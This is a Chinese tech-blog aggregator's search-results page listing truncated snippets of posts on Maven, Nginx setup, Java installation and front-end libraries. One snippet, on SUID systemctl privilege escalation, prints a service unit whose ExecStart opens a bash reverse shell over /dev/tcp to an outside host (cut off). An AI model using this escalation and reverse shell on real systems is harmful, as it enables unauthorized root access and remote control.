码迷,mamicode.com
首页 >  
搜索关键字:maven install    ( 59458个结果
Could not find resource
Maven测试Mybatis出现Could not find resource报错 1.注意Mybatis核心文件的编写 官网 <mappers> <mapper resource="org/mybatis/example/BlogMapper.xml"/> </mappers> 改写成自己 <ma ...
分类:其他好文   时间:2021-05-24 16:01:13    阅读次数:0
Python库推荐
1.arrow python的时间处理库,相对于time和datetime等库而言,语法更加简洁。参考文章 #安装 pip install arrow 注意:arrow库1.0版本后,timestamp方法的语法和低版本有点不太一样(目前发现的一个小bug) 2.pysnooper Python调试 ...
分类:编程语言   时间:2021-05-24 15:49:46    阅读次数:0
Charles的安装
1:点击安装文件charles-proxy-4.2.8-win64.msi 2:点击下一步 3:勾选同意,点击”next”按钮 4:指定安装的路径,继续点击”next”按钮 5:点击”install”按钮 6:等待安装 7:点击”Finish”按钮 8:安装结束 ...
分类:其他好文   时间:2021-05-24 15:35:33    阅读次数:0
Ubuntu 18.04 安装Nginx及部署Vue配置
更新软件包 sudo apt update sudo apt install nginx 查看状态 sudo systemctl status nginx 状态显示绿色active表示正常运行 防火墙开放相关端口 sudo ufw allow 'Nginx Full' 重新加载规则 sudo ufw ...
分类:系统相关   时间:2021-05-24 15:33:12    阅读次数:0
Maven配置阿里镜像
配置方法: 在以下位置加入: <mirror> <id>alimaven</id> <name>aliyun maven</name> <url>http://maven.aliyun.com/nexus/content/groups/public/</url> <mirrorOf>central< ...
分类:其他好文   时间:2021-05-24 15:32:28    阅读次数:0
linux上编译nginx 实现网页开发
wget http://nginx.org/download/nginx-1.16.1.tar.gz # 解压 tar -xzf nginx-1.16.1.tar.gz cd nginx-1.16.1 # yum升级 yum update # yum安装依赖 yum -y install gcc p ...
分类:Web程序   时间:2021-05-24 15:28:40    阅读次数:0
centos安装java8
yum -y install java-1.8.0-openjdk java -version 使用的openjdk 8 oracle下载必须登录,这操作我也是服了。。 ...
分类:编程语言   时间:2021-05-24 15:27:46    阅读次数:0
vue 添加 fastclick 处理移动端click事件300毫秒延迟
astclick:可以处理移动端click事件300毫秒延迟 1、兼容性 iOS 3及更高版本的移动Safari iOS 5及更高版本的Chrome Android上的Chrome(ICS) Opera Mobile 11.5及以上版本 Android 2以来的Android浏览器 PlayBook ...
分类:移动开发   时间:2021-05-24 15:19:24    阅读次数:0
suid-systemctl提权
当systemctl具备suid位或sudo权限时,可以用来进行提权。 一、首先编写一个service unit用来被systemctl加载 echo '[Service] Type=oneshot ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x. ...
分类:其他好文   时间:2021-05-24 14:55:34    阅读次数:0
Element UI 省市区下拉列表和回显省市数据
Element UI 中国省市区级联数据 npm install element-china-area-data -S 1.按需导入 import { provinceAndCityData, regionData, provinceAndCityDataPlus, regionDataPlus, ...
分类:其他好文   时间:2021-05-24 14:52:10    阅读次数:0
59458条   上一页 1 ... 29 30 31 32 33 ... 5946 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!